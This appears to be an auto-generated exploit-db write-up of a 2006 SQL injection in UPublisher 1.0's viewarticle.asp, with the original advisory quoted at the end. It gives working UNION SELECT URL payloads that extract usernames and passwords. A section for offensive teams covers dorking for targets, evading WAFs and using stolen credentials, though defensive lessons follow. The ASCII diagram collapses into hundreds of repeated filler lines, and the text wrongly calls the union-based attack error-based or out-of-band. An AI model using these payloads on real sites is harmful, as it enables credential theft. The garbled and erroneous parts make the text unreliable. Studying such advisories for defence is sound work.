By exploitdb papers bot•November 12, 2006•
papers
UPublisher 1.0 'viewarticle.asp' SQL Injection: A Historical Exploit Deep Dive
UPublisher 1.0 'viewarticle.asp' SQL Injection: A Historical Exploit Deep Dive
What this paper is
This paper details a SQL injection vulnerability found in UPublisher version 1.0. The vulnerability exists in the viewarticle.asp script, specifically within the ID parameter. An attacker can exploit this to inject malicious SQL code, potentially leading to unauthorized access to sensitive data like usernames and passwords from the tblusers table.
Simple technical breakdown
The core of the vulnerability lies in how the web application handles user input for the ID parameter. Instead of properly sanitizing or parameterizing the input, the application directly embeds it into a SQL query. This allows an attacker to break out of the intended query structure and inject their own SQL commands.
The exploit uses a UNION SELECT statement. This SQL technique allows an attacker to combine the results of their injected query with the results of the original, legitimate query. By carefully crafting the UNION SELECT, the attacker can extract data from other tables, such as tblusers, and display it as if it were part of the normal article view.
Complete code and payload walkthrough
The provided source content is not executable code in the traditional sense but rather a description of the vulnerability and an example of the attack vector.
http://[target]/[path]//viewarticle.asp?ID=[SQL]: This is the general URL structure indicating the vulnerable script (viewarticle.asp) and the parameter (ID) that can be exploited.[target]and[path]represent the attacker-controlled parts of the URL to reach the vulnerable application.[SQL]is a placeholder for the injected SQL code.Example: //viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers:ID=-1: This part likely aims to provide a non-existent article ID. By using a value that won't return any legitimate data (like -1), the attacker ensures that the results of theirUNION SELECTstatement will be the primary, if not only, data displayed.%20: This is the URL-encoded representation of a space character. Spaces are crucial for separating SQL keywords and column names.union: This SQL keyword is used to combine the result sets of two or moreSELECTstatements.select: This SQL keyword initiates a query to retrieve data.0,password,username,0,0,0,0: These are the columns the attacker wants to retrieve. The0s are placeholders. The attacker is guessing the structure of the original query and trying to match the number of columns. They are specifically requestingpasswordandusernamefrom thetbluserstable. The number of0s and the order are critical for theUNION SELECTto work, as it must match the number of columns returned by the original query.from%20tblusers: This specifies the table from which to retrieve thepasswordandusernamecolumns.
OR --- //viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers:- This is an alternative example, demonstrating that the attacker might need to adjust the column order or the number of placeholder columns (
0s) to match the original query's structure. Here,usernameandpasswordare requested in a different order, and there are more placeholder0s, suggesting a different original query structure.
- This is an alternative example, demonstrating that the attacker might need to adjust the column order or the number of placeholder columns (
Mapping list:
viewarticle.asp?ID=-> Vulnerable script and parameter.-1-> Non-existent ID to ensure injected results are displayed.%20-> URL-encoded space for SQL syntax.union select-> SQL command to combine query results.0,password,username,0,0,0,0-> Columns to extract and placeholders to match original query structure.from tblusers-> Target table for data extraction.
Practical details for offensive operations teams
- Required Access Level: Typically requires unauthenticated access to the web application. The vulnerability is exposed via a public-facing URL.
- Lab Preconditions:
- A target environment running UPublisher 1.0 or a similarly vulnerable version.
- A web server capable of serving ASP pages (e.g., IIS on Windows).
- A database backend (likely SQL Server, given the ASP context, but could be others) containing the
tbluserstable. - Network connectivity to the target web server.
- Tooling Assumptions:
- A web browser for manual testing and initial reconnaissance.
- A web proxy like Burp Suite or OWASP ZAP to intercept and modify requests.
- SQL injection specific tools (e.g., sqlmap) can automate the discovery and exploitation of such vulnerabilities, though manual crafting is often necessary for complex scenarios or to bypass basic WAFs.
- A list of common SQL injection payloads and techniques.
- Execution Pitfalls:
- Column Mismatch: The most common failure point. The
UNION SELECTstatement must have the same number of columns as the original query. If the number of0s and requested columns doesn't match, the query will fail. This requires enumeration of the original query's column count. - Database Dialect Differences: The exact syntax for
UNION SELECTand table/column names might vary slightly between database systems (e.g., SQL Server, MySQL, PostgreSQL). The provided exploit assumes a common syntax. - Web Application Firewalls (WAFs): Modern WAFs are designed to detect and block common SQL injection patterns like
UNION SELECT. Obfuscation techniques might be required. - URL Encoding: Incorrect URL encoding of special characters can break the injection.
- Application Logic: The application might have specific logic that filters or sanitizes input in unexpected ways, even if it's vulnerable.
- Data Not Displayed: Even if the injection is successful, the extracted data might not be displayed on the web page if the application doesn't render all columns or if there are further processing steps.
- Column Mismatch: The most common failure point. The
- Tradecraft Considerations:
- Reconnaissance: Identify the target application and version. Use search engines (dorks) to find potentially vulnerable instances.
- Enumeration: Determine the number of columns in the original query. This can be done by sending
UNION SELECT NULL, NULL, ...with an increasing number ofNULLs until the query returns an error or a valid result. - Data Extraction: Once the column count is known, inject queries to extract specific data like usernames, passwords, or other sensitive information.
- Blind SQL Injection: If data isn't directly displayed, techniques like blind SQL injection (time-based or boolean-based) might be necessary, though this exploit focuses on error-based or out-of-band data leakage.
- Post-Exploitation: If credentials are exfiltrated, attempt to use them to gain further access to the application or underlying systems.
Where this was used and when
- Context: This exploit targets a specific web application called UPublisher, a content management system or publishing platform.
- Year: Published in November 2006. This indicates it was relevant during that period. Exploits from this era often targeted less sophisticated web application security practices.
- Usage: Such vulnerabilities were commonly exploited by attackers to gain unauthorized access to user credentials stored in web application databases. This could lead to account takeovers, data breaches, or further compromise of the web server.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always validate and sanitize all user-supplied input. This includes checking for expected data types, lengths, and character sets.
- Parameterized Queries (Prepared Statements): This is the most effective defense. Use parameterized queries or prepared statements in your database interactions. This separates the SQL code from the data, preventing user input from being interpreted as executable SQL.
- Principle of Least Privilege: Ensure database accounts used by web applications have only the necessary permissions. Avoid granting broad
SELECT *or administrative privileges. - Web Application Firewalls (WAFs): Implement and properly configure WAFs to detect and block common attack patterns, including SQL injection attempts. However, WAFs should be a layer of defense, not the sole solution.
- Regular Patching and Updates: Keep all web applications, frameworks, and underlying server software up-to-date with the latest security patches.
- Security Audits and Code Reviews: Regularly audit and review web application code for security vulnerabilities.
- Error Handling: Configure applications to display generic error messages to users and log detailed errors server-side. Avoid revealing database error messages directly to the client, as these can provide valuable information to attackers.
ASCII visual (if applicable)
This exploit is a direct manipulation of a web request and its interaction with a backend database. An ASCII diagram can illustrate the flow of data and the point of injection.
+-----------------+ +-----------------+ +-----------------+
| Attacker's |----->| Web Server |----->| Database Server |
| Browser/Tool | | (IIS + ASP) | | (SQL Server) |
+-----------------+ +-------+---------+ +--------+--------+
| ^
| viewarticle.asp?ID=[SQL]|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
---
## Original Exploit-DB Content (Verbatim)
```text
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]